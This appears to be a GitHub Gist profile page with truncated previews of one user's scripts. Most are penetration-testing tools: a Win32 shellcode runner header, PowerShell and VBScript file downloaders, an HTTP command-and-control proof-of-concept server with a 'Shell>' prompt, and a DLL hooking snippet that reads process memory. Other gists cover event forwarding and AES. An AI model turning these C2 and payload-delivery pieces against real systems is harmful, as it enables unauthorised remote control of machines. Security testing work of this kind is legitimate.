Mario macostag

<Subscription xmlns="http://schemas.microsoft.com/2006/03/windows/events/subscription">
<SubscriptionId>Domain Computer Events</SubscriptionId>
<SubscriptionType>SourceInitiated</SubscriptionType>
<Description>Important Domain Controller Events</Description>
<Enabled>True</Enabled>
<Uri>http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog</Uri>
<ConfigurationMode>MinLatency</ConfigurationMode>
<Query>
<![CDATA[<QueryList>
<Query Id="0" Path="Security">
@macostag
macostag / wef.ps1
Last active August 30, 2018 23:45
Configure Windows Event Forwarding.
#Collector:
#Setting WinRM service to automatic start and running quickconfig
Set-Service -Name WinRM -StartupType Automatic
Start-Service -Name WinRM
winrm quickconfig -quiet
#Set the size of the forwarded log
wevtutil sl forwardedevents /ms:1000000000
@macostag
macostag / rlookup.sh
Created August 19, 2018 22:31
IP reverse lookup bash script.
#!/bin/bash
rangeIp=""
for i in `seq 1 1 254`;
do
ip=$rangeIp.$i
#echo $ip
host $ip | grep "pointer";
done
@macostag
macostag / box-setup.sh
Last active October 15, 2019 20:56
Script designed for Ubuntu-based distributions to install my own penetration testing toolsets. Tools are installed in the /pte directory.
#!/bin/bash
#######################################
# Penetration testing toolset
#######################################
apt-get update
apt-get upgrade -y
#apt-get install whois -y
#apt-get install curl -y
#apt-get install wget -y
@macostag
macostag / shellcode-runner.py
Created June 10, 2018 03:13
PyInstaller Win32 shellcode runner.
#!/usr/bin/python
##############################################################
# PyInstaller Win32 shellcode runner - by @mihi42
#
# Needed software:
# * Python 2.7.2 from
# <http://www.python.org/download/releases/>
# * PyWin32 build 217 for Python 2.7 from
# <http://sourceforge.net/projects/pywin32/files/pywin32/>
@macostag
macostag / download.ps1
Created June 3, 2018 02:36
Download files using PowerShell
$storageDir = $pwd
$webclient = New-Object System.Net.WebClient
$url = ""
$file = ""
$webclient.DownloadFile($url,$file)
@macostag
macostag / download.vbs
Created June 3, 2018 02:35
Download files using VBScript
strUrl = WScript.Arguments.Item(0)
StrFile = Wscript.Arguments.Item(1)
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2
Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts
Err.Clear
@macostag
macostag / aes-demo.py
Created May 7, 2018 04:12
AES Encrypt/Decrypt demo
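import os
from Crypto.Cipher import AES
from Crypto.Util import Counter
counter = os.urandom(16)
#AES keys may be 128 bits (16 bytes), 192 bits (24 bytes) or 256 bits (32 bytes) long.
key = os.urandom(32)
# AES Encrypt
# CTR mode needs a counter that advances for every block; a callable that returns a constant reuses one keystream block.
ctr = Counter.new(128, initial_value=int(counter.encode("hex"), 16))
enc = AES.new(key, AES.MODE_CTR, counter=ctr)
encrypted = enc.encrypt("Secret")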
@macostag
macostag / poc-http-cc.py
Created May 7, 2018 03:42
POC HTTP C&C
# HTTP SERVER
#--------------------------------------------
import BaseHTTPServer
import os, cgi
HOST_NAME = '172.16.20.201'
PORT_NUMBER = 80
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_GET(s):
        command = raw_input("Shell> ")
@macostag
macostag / hook-example.py
Last active May 7, 2018 00:33
DLL function hooking example
from winappdbg import Debug, EventHandler, System, Process
import sys
# this is the call back function
def YYYY( event, ra ,arg1 ,arg2, arg3):
    # read 1 KB of the memory content
    print process.read( arg2,1024 )
class MyEventHandler( EventHandler ):